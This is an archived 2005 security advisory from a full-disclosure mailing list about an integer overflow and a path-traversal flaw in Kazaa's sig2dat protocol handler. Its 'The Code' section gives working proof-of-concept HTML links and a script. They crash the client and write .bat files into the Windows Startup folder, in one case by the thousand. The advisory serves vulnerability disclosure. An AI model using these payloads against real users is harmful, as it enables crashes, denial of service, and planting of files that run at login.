[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001201c4fcd4$d32e9c10$f85ab350@noone>
Date: Mon, 17 Jan 2005 22:40:47 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: Windows NTBugtraq Mailing List <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
vulnwatch@...nwatch.org,
"securitytracker.com" <bugs@...uritytracker.com>, news@...uriteam.com,
full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Kazaa Sig2Dat Protocol Remote Integer Overflow
and Denial Of Service by creating files in arbitrary locations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Kazaa
Vendors: http://www.kazaa.com
Versions: kazaa lite k++(probably all others too...)
Platforms: Windows
Bug: Sig2Dat Protocol Remote Integer Overflow and
Denial Of Service by creating files in arbitrary
locations
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@...l.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Kazaa is currently the world’s most common P2P file sharing application.
When installing Kazaa a new protocol is installed named “sig2dat”.
This protocol contain an integer overflow vulnerability which may cause
a crash and may allow remote execution of code. There is another
vulnerability in the “File:” parameter which allows creating files in
arbitrary locations and committing Denial Of Service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
The sig2dat protocol syntax:
Sig2dat://<filename>%7c<file length in bytes>< file length in
kilobytes>%7c<HASH>%7c
The vulnerable parameter is the file “Length” (in bytes). Specifying a
numeric value bigger than a 999999999.
Successful exploiting of this vulnerability may allow remote code execution.
There is another vulnerability in the “File:” parameter. It allows creation
of files in arbitrary locations within the same partition as the shared
folder,
using the classic directory transversal technique “../”.
For Example:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/
Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:99999999999999999999
9999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK
HERE</A>
*********************************************************************
2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu
/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m
3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
3) <script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists